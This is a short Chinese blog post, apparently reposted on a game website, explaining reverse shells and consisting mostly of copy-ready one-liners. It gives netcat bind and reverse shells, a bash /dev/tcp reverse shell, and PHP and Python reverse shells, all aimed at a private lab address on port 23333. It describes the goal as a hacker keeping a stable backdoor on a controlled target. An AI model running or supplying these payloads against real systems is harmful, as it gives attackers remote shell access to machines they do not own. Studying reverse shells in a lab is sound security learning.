3分钟搞懂反弹shell

3分钟搞懂反弹shell

首页休闲益智反弹攻击更新时间:2024-05-05

实际上,很早很早以前就听说过反弹shell,我最早做的网络安全实验就开始反弹shell。比如这个知乎live中的第三个实验TCP会话劫持,就反弹了shell。一年前在与攻防团队的交流会上,再次听到反弹shell,当时也没放在心上,反正挺重要的。直到今天,才算彻底明白反弹shell是咋回事。如果用一句话概述,那么反弹shell就是:

黑客控制了目标,弹一个shell,构建一个稳定的通信后门。

【网络安全】TCP-IP协议攻击 作者 ailx10


正向shell:客户端想要获得服务端的shell

反向shell:服务端想要获得客户端的shell(也就是反弹shell)

正向shell(服务端送shell)

nc -lvp 23333 -e /bin/sh

nc 192.168.160.140 23333

反向shell(客户端送shell)

update-alternatives --config nc

nc -lvp 23333

nc 192.168.160.140 23333 -e /bin/sh

bash反弹shell

bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反弹shell

php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'

python反弹shell

python -c 'import socket,subprocess,os; \ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.160.140",23333)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

本篇完~

查看全文
大家还看了
也许喜欢
更多游戏

Copyright © 2024 妖气游戏网 www.17u1u.com All Rights Reserved